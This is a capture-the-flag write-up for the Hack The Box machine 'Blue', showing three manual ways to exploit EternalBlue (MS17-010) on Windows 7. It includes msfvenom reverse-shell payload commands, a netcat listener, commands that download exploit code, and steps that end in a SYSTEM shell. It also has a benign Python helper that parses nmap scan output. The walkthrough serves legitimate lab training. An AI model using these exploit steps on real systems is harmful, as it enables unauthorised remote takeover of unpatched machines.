Hack The Box — Blue (Exploiting MS17-010 Manually: 3 Ways)

Blue is an Easy-rated Windows machine on Hack The Box and is also OSCP-like. We use the popular EternalBlue exploit to get an Admin shell on the target. I have covered the MS17-010 exploit manually in this writeup and also mentioned 1–2 other ways to exploit the vulnerability. I will also cover an error which you might face, “ImportError: No module named impacket”, and how to fix it.

ENUMERATION

From the nmap scan, we see that ports 123, 139, 445 and 49152–49157 (running RPC) are open and the target is running Windows 7 Professional 7601 Service Pack 1. Any pentester who has been in this field knows that Windows 7 is vulnerable to the popular EternalBlue exploit (MS17-010).

So let's check if our target is vulnerable to the EternalBlue exploit. To do so we can use nmap's NSE scripts. Here I have used --script vuln, which scans for CVEs, and in the image below we can clearly see VULNERABLE and MS17-010.

You can also use another nmap script which specifically scans for EternalBlue:

nmap --script smb-vuln-ms17-010.nse <target-ip>

Again it shows VULNERABLE!!!
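As an added example (not part of the original writeup), here is a small Python helper that reads the XML output of the nmap check above (run with -oX) and lists which hosts nmap flagged as VULNERABLE, which is how a defender would track unpatched SMBv1 hosts across a range rather than one box at a time. The embedded XML is constructed for this example to mirror the layout nmap's vulns NSE library emits; the second, patched host is made up to exercise the non-vulnerable path.

```python
import xml.etree.ElementTree as ET
# Constructed sample of "nmap -oX" output for two hosts scanned with
# --script smb-vuln-ms17-010, laid out as nmap's vulns NSE library emits it
# (script -> table keyed by CVE -> "state" elem); addresses are made up.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap">
  <host>
    <address addr="10.10.10.40" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="10.10.10.41" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="state">NOT VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""

def ms17_010_status(xml_text):
    """Map each scanned IPv4 address to the MS17-010 state nmap reported;
    hosts where the script produced no state map to None, not 'patched'."""
    results = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        state = None
        for script in host.iter("script"):
            if script.get("id") == "smb-vuln-ms17-010":
                elem = script.find("table/elem[@key='state']")
                if elem is not None:
                    state = elem.text
        results[addr.get("addr")] = state
    return results

def vulnerable_hosts(xml_text):
    """Sorted addresses nmap flagged VULNERABLE: the unpatched SMBv1 hosts."""
    return sorted(ip for ip, state in ms17_010_status(xml_text).items()
                  if state == "VULNERABLE")
```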

However, since we have SMB on the target, let's see if we can access any share which might contain useful info. For this, we use smbclient.

We list all shares.

As we can see below, we can anonymously connect to the shares; however, we do not find any useful info here.

EXPLOITING ETERNALBLUE (MS17–010)

Here I will cover 3 different ways to use this exploit. DO NOTE that this exploit performs a buffer overflow on the target's SMB service and might crash the target, so reset the box if the exploit fails.

1) USING THE ORIGINAL EXPLOIT

This method requires a bit of hassle and is NOT RECOMMENDED (I would suggest you try 2 and 3). In this method we use the original script from searchsploit or Exploit-DB, and we need to make manual changes to the code, such as the username and also a part of the code.

Here is another writeup which you can refer to: https://infosecwriteups.com/tryhackme-relevant-ctf-write-up-7705501b73dd (This one is for a different box from TryHackMe, but the process is the same.)

We're working with Windows 7 so we'll use exploit #42315. Clone the exploit into the working directory.

After looking at the source code, we need to do three things:

  1. Download mysmb.py since the exploit imports it. The download location is included in the exploit.
  2. Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).
  3. Make changes in the exploit to add the authentication credentials and the reverse shell payload.

First, download the file and rename it to mysmb.py. (The bin-sploits copy of 42315.py is mysmb.py itself; since 42315.py already exists in the directory, wget saves the download as 42315.py.1, which is why the mv below uses that name.)

wget https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42315.py
mv 42315.py.1 mysmb.py

Second, use MSFvenom to generate a simple executable with a reverse shell payload.

msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.6 LPORT=4444 > eternal-blue.exe

Third, we need to change the exploit to add credentials. In our case we don't have valid credentials; however, let's check to see if guest login is allowed.

If you run enum4linux, you can see that guest login is supported.

enum4linux -a 10.10.10.40
  • -a: Do all simple enumeration

We’ll add that to the exploit script.

Similarly, we’ll add the reverse shell executable location and get the script to execute it.

Now that we've done all three tasks, set up a listener on your attack machine.

nc -nlvp 4444

Then run the exploit.

python 42315.py 10.10.10.40

If everything works fine, we will get a shell with SYSTEM privileges!

DO NOTE: IF YOU GET AN ERROR like “ImportError: No module named impacket”, all you have to do is refer to https://stackoverflow.com/questions/65869381/pip2-installation-on-ubuntu-20-04

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py

and then:

pip install impacket

Do note that the exploit is Python 2 code, so it will work only if your python is version 2 and the pip you install impacket with is also the Python 2 pip.

2) USING AUTOBLUE FROM GITHUB

https://github.com/3ndG4me/AutoBlue-MS17-010

Clone it, run the shell_prep.sh script and set the correct options.

It will automatically create x64 and x86 shellcode. Now finally run the exploit:

python eternalblue_exploit7.py <target-ip> revershell

CATCH THE REVERSE SHELL ON NETCAT AND WE ARE SYSTEM USER !!!

3) USING SEND_AND_EXECUTE.PY FROM GITHUB

https://github.com/helviojunior/MS17-010

As you can see below, we have a file called send_and_execute.py which is our main exploit. MAKE SURE TO EDIT the exploit script and set the username.

In our case, we set the username to guest

Now we need to make a reverse shell using msfvenom. Don't forget to use EXITFUNC=thread in the payload for it to work. (For this box, it was not working when I didn't use it.)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.73 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe

Finally, let's run our exploit.

USAGE: python send_and_execute.py <target-ip> reverseshell

WE HAVE A SHELL AS SYSTEM!!!!

The 4th way is to use Metasploit, which you can do easily :P

I hope you learned a lot from this writeup. Although this box was easy, fixing the impacket error and also editing the code manually does take time. If you are looking for a similar box which uses EternalBlue, you can solve Relevant from TryHackMe.

Make sure to follow me here on Medium so that you don't miss such OSCP-like writeups and articles. -ZEUS


I am a Penetration Tester, currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python. I share my knowledge on YouTube.
